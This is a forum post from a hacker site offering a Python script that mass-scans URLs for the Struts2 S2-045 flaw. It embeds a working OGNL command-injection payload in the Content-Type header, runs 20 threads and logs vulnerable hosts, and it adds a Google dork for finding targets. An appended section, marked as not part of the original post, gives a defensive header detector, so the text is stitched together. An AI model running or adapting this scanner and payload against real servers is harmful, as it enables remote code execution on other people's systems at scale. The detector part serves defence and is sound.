S2-045 multithreaded batch verification PoC, with examples - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C

import requests
import Queue
import threading
import sys


def poc():
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
        "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Wsbug').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    }
    while not Q.empty():
        url=Q.get()
        try:
            xy = requests.get(url=url,headers=headers,timeout=5).text
            if 'Wsbug' in xy:
                print url
                with open('OK.txt','a+') as f2:
                    f2.write(url+'\n')
        except:
            pass


if __name__ == '__main__':
    Q = Queue.Queue()
    with open(sys.argv[1]) as f:
        for i in f:
            Q.put(i)
    for i in xrange(20):
        x=threading.Thread(target=poc)
        x.start()

Usage:
st2.py x.txt



For example:
st2.py url.txt



Google keyword:
filetype:action (Google only; Baidu does not work)



Some examples:
Tags: Struts2
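
The script above delivers its OGNL expression in the Content-Type request header, so requests of this kind can be picked out of captured headers (proxy or WAF logs). The following is an added detection example, not part of the original post; the request record layout, the function names and the sample values are assumptions made for illustration.

```python
import re

# Media type grammar: type "/" subtype, then optional ;name=value parameters.
TOKEN = r"[A-Za-z0-9!#$&^_.+-]+"
MEDIA_TYPE = re.compile(
    rf'^{TOKEN}/{TOKEN}(\s*;\s*{TOKEN}=(?:{TOKEN}|"[^"\\]*"))*\s*$')
# Substrings of the Content-Type value in the script above; "${" is added
# here as the other expression opener that Struts evaluates.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "ognl.OgnlContext",
                "java.lang.ProcessBuilder", "@java.lang.")


def classify_content_type(value):
    """Return (verdict, reasons) for one Content-Type header value."""
    reasons = [m for m in OGNL_MARKERS if m in value]
    if reasons:
        return "ognl-expression", reasons
    if not MEDIA_TYPE.match(value):
        return "malformed", ["not a valid media type"]
    return "ok", []


def scan(requests_seen):
    """Return (client, path, verdict, reasons) for each suspicious request."""
    findings = []
    for req in requests_seen:
        # Header names are case-insensitive, so normalise before lookup.
        headers = {k.lower(): v for k, v in req["headers"].items()}
        ctype = headers.get("content-type")
        if ctype is None:
            continue
        verdict, reasons = classify_content_type(ctype)
        if verdict != "ok":
            findings.append((req["client"], req["path"], verdict, reasons))
    return findings


# Constructed sample requests: documentation addresses, shortened header values.
SAMPLE = [
    {"client": "192.0.2.10", "path": "/upload.action",
     "headers": {"Content-Type": "multipart/form-data; boundary=----FormBoundaryAbC123"}},
    {"client": "198.51.100.7", "path": "/login.action",
     "headers": {"content-type": "%{(#nike='multipart/form-data').(#_memberAccess=...)}"}},
    {"client": "203.0.113.5", "path": "/index.action",
     "headers": {"Content-Type": "not-a-media-type"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A legitimate Content-Type never contains an expression opener, so the marker check can be enforced as a block rule at a reverse proxy as well as used for log review.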

Comments

    小赢哥  first reply, posted 2017-04-07 16:34
    1